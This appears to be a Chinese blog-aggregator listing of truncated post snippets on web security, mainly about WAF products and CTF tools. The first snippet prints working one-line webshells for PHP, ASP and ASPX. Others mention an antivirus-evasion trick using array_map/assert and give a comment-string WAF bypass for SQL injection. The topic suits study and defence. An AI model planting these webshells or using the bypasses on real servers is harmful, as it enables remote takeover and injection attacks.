php <?php @eval($_post['pass']);?> asp <%eval request ("pass")%> aspx <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%> 防御 代码中过滤。 ...
分类:
其他好文 时间:
2019-08-17 17:48:05
阅读次数:
112
Bugku-Tool https://tool.bugku.com/?wafcloud=1 https://www.ctftools.com/ http://tool.oschina.net/encrypt?type=3 http://tool.oschina.net/ http://ctf.ssl ...
分类:
其他好文 时间:
2019-08-17 17:45:51
阅读次数:
430
安装 使用说明 免杀 array_map | assert ...
分类:
其他好文 时间:
2019-08-15 11:20:28
阅读次数:
110
X-WAF 是一款方便易用的云WAF,使用反向代理的方式介入Web服务器和访问者之间,不需要像 modSecurity 和 Naxsin 那样作为nginx的模块,需要进行编译安装 X-WAF使用 OpenResty 作为反向代理软件,并借助 OpenResty 的 Lua 作为防御脚本的编写和运作 ...
分类:
其他好文 时间:
2019-08-10 21:12:52
阅读次数:
148
用途:防止sql注入,本地包含,部分溢出,fuzzing测试,xss,×××F等web***防止svn/备份之类文件泄漏防止ApacheBench之类压力测试工具的***屏蔽常见的扫描***工具,扫描器屏蔽异常的网络请求屏蔽图片附件类目录php执行权限防止webshell上传1.下载并解压luajit2.0.5wgethttp://luajit.org/download/LuaJIT-2.0.5.tar
分类:
其他好文 时间:
2019-08-10 09:52:11
阅读次数:
153
举例:下面这个WAF,/*%!/*/可以绕过空格 ...
分类:
数据库 时间:
2019-08-09 01:36:58
阅读次数:
107
您可使用 AWS WAF 控制 API 网关、Amazon CloudFront 或 应用程序负载均衡器 如何响应 Web 请求。您首先需创建条件、规则和 Web 访问控制列表 (Web ACL)。您需要定义条件、将条件合并为规则并将规则合并为 Web ACL。 条件 条件定义您希望 AWS WAF ...
分类:
其他好文 时间:
2019-07-28 13:31:53
阅读次数:
146
